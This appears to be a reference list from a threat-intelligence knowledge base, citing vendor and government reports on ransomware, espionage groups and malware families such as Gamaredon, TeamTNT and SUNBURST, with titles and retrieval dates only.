- Cylance. (2019, July 3). Threat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.
- Falcone, R., et al. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.
- Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021.
- Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S. Retrieved April 10, 2019.
- Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins?. Retrieved January 6, 2021.
- GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
- CrowdStrike. (2022, May). ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK. Retrieved June 27, 2022.
- KISA. (2021). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 8, 2024.
- Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.
- Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.
- Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.
- DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
- Cybereason Nocturnus. (2020, July 16). A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES. Retrieved November 18, 2020.
- Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.
- Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.
- Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020.
- Moran, N., Oppenheim, M., Engle, S., & Wartell, R. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.
- Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.
- Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.
- Unit 42. (2022, December 20). Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. Retrieved September 12, 2024.
- Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.
- Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.
- CERT-EE. (2021, January 27). Gamaredon Infection: From Dropper to Entry. Retrieved February 17, 2022.
- Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.
- Asheer Malhotra & Vitor Ventura. (2022, August 2). Manjusaka: A Chinese sibling of Sliver and Cobalt Strike. Retrieved September 4, 2024.
- Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021.
- Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.
- GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.
- MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022.
- Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.
- Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- Dupuy, T. and Faou, M. (2021, June). Gelsemium. Retrieved November 30, 2021.
- Mike Stokkel et al. (2024, July 18). APT41 Has Arisen From the DUST. Retrieved September 16, 2024.
- Vengerik, B. et al. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.
- Vengerik, B. & Dennesen, K. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019.
- Mandiant Israel Research Team. (2022, August 17). Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors. Retrieved September 21, 2022.
- Grunzweig, J. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.
- Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022.
- Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021.
- Lambert, T. (2020, January 29). Intro to Netwire. Retrieved January 7, 2021.
- Dedola, G. (2022, June 21). APT ToddyCat. Retrieved January 3, 2024.
- ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.
- Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016.
- Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.
- Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016.
- Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020.
- FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.
- Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.
- Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.
- Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.
- MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.
- Meltzer, M. et al. (2024, January 10). Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN. Retrieved February 27, 2024.
- McLellan, T. et al. (2024, January 12). Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation. Retrieved February 27, 2024.
- Muhammad, I., Unterbrink, H. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.
- Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020.
- Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.
- ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.
- Abramov, D. (2020, April 13). Grandoreiro Malware Now Targeting Banks in Spain. Retrieved November 12, 2020.
- Haquebord, F. et al. (2022, March 17). Cyclops Blink Sets Sights on Asus Routers. Retrieved March 17, 2022.
- NCSC. (2022, February 23). Cyclops Blink Malware Analysis Report. Retrieved March 3, 2022.
- Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.
- Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021.
- Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.
- Fiser, D., Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.
- Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.
- Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.
- Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.
- Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.
- Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.
- FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.
- Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved September 19, 2024.
- Falcone, R. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.
- CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.
- PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.
- PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.
- Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
- Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.
- Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.
- Pantazopoulos, N. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.
- Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.
- F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
- Cherepanov, A. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.
- Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.
- Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.
- fatedier. (n.d.). What is frp?. Retrieved July 10, 2024.
- Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023.
- Harbison, M. and Renals, P. (2022, July 5). When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors. Retrieved February 1, 2023.
- Secureworks Counter Threat Unit Research Team. (2022, August 17). DarkTortilla Malware Analysis. Retrieved November 3, 2022.